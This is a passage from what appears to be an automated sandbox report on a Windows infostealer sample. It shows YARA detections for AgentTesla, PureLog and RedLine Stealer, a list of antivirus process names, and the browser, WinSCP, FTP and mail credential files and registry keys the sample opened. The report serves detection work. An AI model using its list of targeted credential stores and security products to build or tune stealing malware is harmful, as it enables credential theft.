                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_029891C8 GetLocalTime,19_2_029891C8
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_0298B748 GetVersionExA,19_2_0298B748
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 00000019.00000002.1788431061.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1680679015.000000003DE32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2554879629.000000003DD81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1680679015.000000003DE5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1788431061.0000000025FEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2554879629.000000003DDAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: bwsiuvcU.pif PID: 6340, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: bwsiuvcU.pif PID: 2196, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: bwsiuvcU.pif PID: 2324, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 27.3.bwsiuvcU.pif.3bd8fed0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3ede5570.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.26fc9b90.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.284a0f08.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.40260000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3daa5566.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3dad5566.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3ee39b90.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.409b0000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3ed35570.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.284a0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3daa5566.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.26f76478.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.40260000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.3.bwsiuvcU.pif.3bd8fed0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3daa646e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.40350000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3dad646e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3daa646e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3ed35570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.26f75570.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3ede5570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.25dd646e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.28c40000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.28c40000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3ed36478.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.40260f08.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3ed36478.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3ed89b90.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.26f75570.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.25dd646e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.284a0f08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.25dd5566.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.284a0000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.40350f08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.409c0000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.26f76478.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.409b0000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.40350000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3dad5566.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.26fc9b90.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.40350f08.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.25dd5566.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3ed89b90.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3ede6478.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.3.bwsiuvcU.pif.3bdc99c8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.3.bwsiuvcU.pif.3bdc99c8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1682459055.00000000409C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2556241672.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1792368001.0000000028C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000017.00000002.1639938993.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000003.1494437975.000000007EB10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1639938993.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1732584170.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000001.1707928386.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2524457336.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1519434101.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000001.1494452738.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2524457336.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000001.1624046151.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000001.1624046151.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000001.1494452738.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000001.1707928386.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1732584170.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: bwsiuvcU.pif PID: 6340, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: bwsiuvcU.pif PID: 2196, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: bwsiuvcU.pif PID: 2324, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 00000019.00000002.1788431061.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1680679015.000000003DE32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2554879629.000000003DD81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1680679015.000000003DE5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1788431061.0000000025FEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2554879629.000000003DDAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: bwsiuvcU.pif PID: 6340, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: bwsiuvcU.pif PID: 2196, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: bwsiuvcU.pif PID: 2324, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 27.3.bwsiuvcU.pif.3bd8fed0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3ede5570.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.26fc9b90.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.284a0f08.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.40260000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3daa5566.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3dad5566.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3ee39b90.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.409b0000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3ed35570.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.284a0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3daa5566.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.26f76478.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.40260000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.3.bwsiuvcU.pif.3bd8fed0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3daa646e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.40350000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3dad646e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3daa646e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3ed35570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.26f75570.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3ede5570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.25dd646e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.28c40000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.28c40000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3ed36478.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.40260f08.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3ed36478.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3ed89b90.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.26f75570.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.25dd646e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.284a0f08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.25dd5566.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.284a0000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.40350f08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.409c0000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.26f76478.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.409b0000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.40350000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3dad5566.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.26fc9b90.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.40350f08.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.25dd5566.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.3ed89b90.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.3ede6478.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.3.bwsiuvcU.pif.3bdc99c8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.3.bwsiuvcU.pif.3bdc99c8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1682459055.00000000409C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
